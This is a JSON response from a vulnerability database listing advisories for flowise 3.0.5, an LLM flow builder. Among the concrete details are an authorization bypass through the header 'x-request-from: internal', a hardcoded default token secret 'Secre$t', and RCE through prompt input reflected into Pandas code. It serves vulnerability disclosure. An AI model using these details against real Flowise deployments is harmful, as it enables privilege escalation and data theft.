Look up vulnerable packages by Package URL.

GET /api/packages/34083?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/packages/34083?format=api",
    "purl": "pkg:npm/flowise@3.0.5",
    "type": "npm",
    "namespace": "",
    "name": "flowise",
    "version": "3.0.5",
    "qualifiers": {},
    "subpath": "",
    "is_vulnerable": true,
    "next_non_vulnerable_version": "3.1.0",
    "latest_non_vulnerable_version": "3.1.2",
    "affected_by_vulnerabilities": [
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80675?format=api",
            "vulnerability_id": "VCID-14af-nhf3-aqba",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, a Mass Assignment vulnerability in the DocumentStore creation endpoint allows authenticated users to control the primary key (id) and internal state fields of DocumentStore entities. Because the service uses repository.save() with a client-supplied primary key, the POST create endpoint behaves as an implicit UPSERT operation. This enables overwriting existing DocumentStore objects. In multi-workspace or multi-tenant deployments, this can lead to cross-workspace object takeover and broken object-level authorization (IDOR), allowing an attacker to reassign or modify DocumentStore objects belonging to other workspaces. This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41277",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00321",
                            "scoring_system": "epss",
                            "scoring_elements": "0.55521",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41277"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41277",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41277"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3prp-9gf7-4rxx",
                    "reference_id": "GHSA-3prp-9gf7-4rxx",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-3prp-9gf7-4rxx"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3prp-9gf7-4rxx",
                    "reference_id": "GHSA-3prp-9gf7-4rxx",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-25T01:31:25Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3prp-9gf7-4rxx"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-41277",
                "GHSA-3prp-9gf7-4rxx"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-14af-nhf3-aqba"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359768?format=api",
            "vulnerability_id": "VCID-17k4-psgt-sydg",
            "summary": "Flowise: Weak Default Token Hash Secret\n**Detection Method:** Kolega.dev Deep Code Scan\n\n| Attribute | Value |\n|---|---|\n| Location | packages/server/src/enterprise/utils/tempTokenUtils.ts:31-34 |\n| Practical Exploitability | Medium |\n| Developer Approver | faizan@kolega.ai |\n\n### Description\nThe encryption key for token encryption has a weak default value 'Secre$t' when TOKEN_HASH_SECRET environment variable is not set.\n\n### Affected Code\n```\nconst key = crypto\n    .createHash('sha256')\n    .update(process.env.TOKEN_HASH_SECRET || 'Secre$t')\n    .digest()\n```\n\n### Evidence\nThe default value 'Secre$t' is hardcoded in the source code and is cryptographically weak. This key is used to encrypt user IDs and workspace IDs in JWT tokens.\n\n### Impact\nToken forgery - attackers can decrypt and manipulate encrypted token metadata, potentially changing user IDs or workspace IDs to escalate privileges or access unauthorized data.\n\n### Recommendation\nRequire TOKEN_HASH_SECRET to be set as a strong random value in environment variables. Throw an error on startup if not configured. Use a minimum of 32 bytes of entropy.\n\n### Notes\nThe TOKEN_HASH_SECRET has a weak hardcoded default 'Secre$t' (lines 31-34 and 50-53). This secret is used to derive an AES-256-CBC encryption key for encrypting sensitive metadata (user ID and workspace ID) embedded in JWT tokens via encryptToken() called at line 394 of passport/index.ts. If TOKEN_HASH_SECRET is not configured, an attacker knowing the default can decrypt the 'meta' field in JWTs to extract user IDs and workspace IDs. While this alone doesn't grant access (the JWT signature is separate), it leaks internal identifiers that could aid other attacks. The .env.example shows '# TOKEN_HASH_SECRET='popcorn'' - another weak value, and it's commented out suggesting it's optional. The application should require this secret to be explicitly set with a strong random value.",
            "references": [
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-m7mq-85xj-9x33",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-m7mq-85xj-9x33"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-m7mq-85xj-9x33",
                    "reference_id": "GHSA-m7mq-85xj-9x33",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-m7mq-85xj-9x33"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "GHSA-m7mq-85xj-9x33"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-17k4-psgt-sydg"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/65503?format=api",
            "vulnerability_id": "VCID-19jc-umg6-v7ce",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, multiple tool implementations directly import and invoke raw HTTP clients (node-fetch, axios) instead of using the secured wrapper. These tools include (1) OpenAPIToolkit/OpenAPIToolkit.ts, (2) WebScraperTool/WebScraperTool.ts, (3) MCP/core.ts, and (4) Arxiv/core.ts. This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43995",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00066",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20656",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43995"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43995",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43995"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qqvm-66q4-vf5c",
                    "reference_id": "GHSA-qqvm-66q4-vf5c",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-qqvm-66q4-vf5c"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-qqvm-66q4-vf5c",
                    "reference_id": "GHSA-qqvm-66q4-vf5c",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:19:54Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-qqvm-66q4-vf5c"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-43995",
                "GHSA-qqvm-66q4-vf5c"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-19jc-umg6-v7ce"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80896?format=api",
            "vulnerability_id": "VCID-1xfp-4rtg-4bcu",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, there is a remote code execution vulnerability in AirtableAgent.ts caused by lack of input verification when using Pandas. The user’s input is directly applied to the question parameter within the prompt template and it is reflected to the Python code without any sanitization. This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41138",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00575",
                            "scoring_system": "epss",
                            "scoring_elements": "0.69236",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41138"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41138",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41138"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-f228-chmx-v6j6",
                    "reference_id": "GHSA-f228-chmx-v6j6",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-f228-chmx-v6j6"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-f228-chmx-v6j6",
                    "reference_id": "GHSA-f228-chmx-v6j6",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T14:18:47Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-f228-chmx-v6j6"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-41138",
                "GHSA-f228-chmx-v6j6"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1xfp-4rtg-4bcu"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/118629?format=api",
            "vulnerability_id": "VCID-39aw-3gc6-bkgb",
            "summary": "Flowise before 3.0.5 allows XSS via an IFRAME element when an admin views the chat log.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-50538",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00102",
                            "scoring_system": "epss",
                            "scoring_elements": "0.27496",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-50538"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/commit/9a06a85a8ddcbaeca1342827a5fea9087a587d97",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/commit/9a06a85a8ddcbaeca1342827a5fea9087a587d97"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/pull/4905",
                    "reference_id": "4905",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-06T13:53:34Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/pull/4905"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50538",
                    "reference_id": "CVE-2025-50538",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50538"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.5",
                    "reference_id": "flowise%403.0.5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-06T13:53:34Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.5"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-964p-j4gg-mhwc",
                    "reference_id": "GHSA-964p-j4gg-mhwc",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-964p-j4gg-mhwc"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-964p-j4gg-mhwc",
                    "reference_id": "GHSA-964p-j4gg-mhwc",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-06T13:53:34Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-964p-j4gg-mhwc"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/34082?format=api",
                    "purl": "pkg:npm/flowise@3.0.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-488c-vrqu-f7hf"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-6ufs-d346-d7ev"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-9bht-svq8-87b4"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-affy-v76q-fub6"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dtss-epth-z7fh"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-jcze-eg2c-mkcf"
                        },
                        {
                            "vulnerability": "VCID-k579-xd81-hqdu"
                        },
                        {
                            "vulnerability": "VCID-ksmv-s6c9-t7ap"
                        },
                        {
                            "vulnerability": "VCID-m3j3-4u39-euht"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-ywgu-76cy-uqe7"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.8"
                }
            ],
            "aliases": [
                "CVE-2025-50538",
                "GHSA-964p-j4gg-mhwc"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-39aw-3gc6-bkgb"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80784?format=api",
            "vulnerability_id": "VCID-3gp6-wwtd-kkf1",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the text-to-speech generation endpoint (POST /api/v1/text-to-speech/generate) is whitelisted (no auth) and accepts a credentialId directly in the request body. When called without a chatflowId, the endpoint uses the provided credentialId to decrypt the stored credential (e.g., OpenAI or ElevenLabs API key) and generate speech. This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41279",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00124",
                            "scoring_system": "epss",
                            "scoring_elements": "0.31174",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41279"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41279",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41279"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-5fw2-mwhh-9947",
                    "reference_id": "GHSA-5fw2-mwhh-9947",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-5fw2-mwhh-9947"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5fw2-mwhh-9947",
                    "reference_id": "GHSA-5fw2-mwhh-9947",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T20:17:43Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5fw2-mwhh-9947"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-41279",
                "GHSA-5fw2-mwhh-9947"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3gp6-wwtd-kkf1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/66503?format=api",
            "vulnerability_id": "VCID-488c-vrqu-f7hf",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, Flowise trusts any HTTP client that sets the header x-request-from: internal, allowing an authenticated tenant session to bypass all /api/v1/** authorization checks. With only a browser cookie, a low-privilege tenant can invoke internal administration endpoints (API key management, credential stores, custom function execution, etc.), effectively escalating privilege. This issue has been patched in version 3.0.13.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30820",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00133",
                            "scoring_system": "epss",
                            "scoring_elements": "0.32393",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30820"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30820",
                    "reference_id": "CVE-2026-30820",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30820"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13",
                    "reference_id": "flowise%403.0.13",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-09T20:35:16Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-wvhq-wp8g-c7vq",
                    "reference_id": "GHSA-wvhq-wp8g-c7vq",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-wvhq-wp8g-c7vq"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wvhq-wp8g-c7vq",
                    "reference_id": "GHSA-wvhq-wp8g-c7vq",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
